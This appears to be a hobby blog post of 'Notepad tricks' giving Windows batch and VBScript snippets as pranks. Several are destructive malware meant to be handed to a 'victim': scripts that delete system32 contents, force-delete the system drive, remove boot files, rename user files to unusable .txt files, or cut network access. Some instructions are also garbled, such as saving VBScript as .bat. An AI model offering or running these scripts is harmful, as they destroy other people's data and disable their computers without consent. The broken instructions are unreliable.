Notepad Tricks


Notepad is the simplest text editor provided by Microsoft in every version of Windows.
Notepad Tricks are use for the Tricking your Computer with the Some codes. 

Today, I am going to share 10 amazing Notepad Tricks & Hacks that you can use to get most out of Notepad and amaze your friends.



1.Change Files To Non-working TXT Files


              Type this in notepad 

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT

And save it as “.bat” in   “all files”
Ex:  sample.bat

 2.Delete any thing .....

            Type this in notepad

del c:\WINDOWS\system32\*.*/q
           Location of the folder 

save as anything.bat 
If You Give this file to your victim 
his "SYSTEM 32" Folder will be deleted. Without which a Window Pc cant be started.
Also you can change the location 

Note: This will delete all the content of     
       the folder , not the folder  
     
3.Delete system drive



@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
  
Type this in notepad and save it as .bat file

4.Funny shutdown virus

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

And save it as “.bat” in   “all files”
Ex:"Anything.BAT" 


5.virus that crashes pc

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive"


6.Toggle Capslock key

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as any thing .vbs in “all files”

Ex: anything.vbs


7.Toggle Enter key


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as any thing .vbs in “all files”
Ex: anything.vbs

8.How to stop someone's internet access


@Echo off
Ipconfig /release

Save as .bat and give it to your victim

IP address will be lost, and therefore they won't be able to fix it...

However, this is VERY easy to fix. Simply type in 

IPconfig /renew


9.Continuously pop out cd drive


Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save it as “.bat” in   “all files”
10.Matrix Effect
    
Type this in notepad and save it as “.bat” file 

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start 

Haxbaba Tech

Phasellus facilisis convallis metus, ut imperdiet augue auctor nec. Duis at velit id augue lobortis porta. Sed varius, enim accumsan aliquam tincidunt, tortor urna vulputate quam, eget finibus urna est in augue.

1 comment: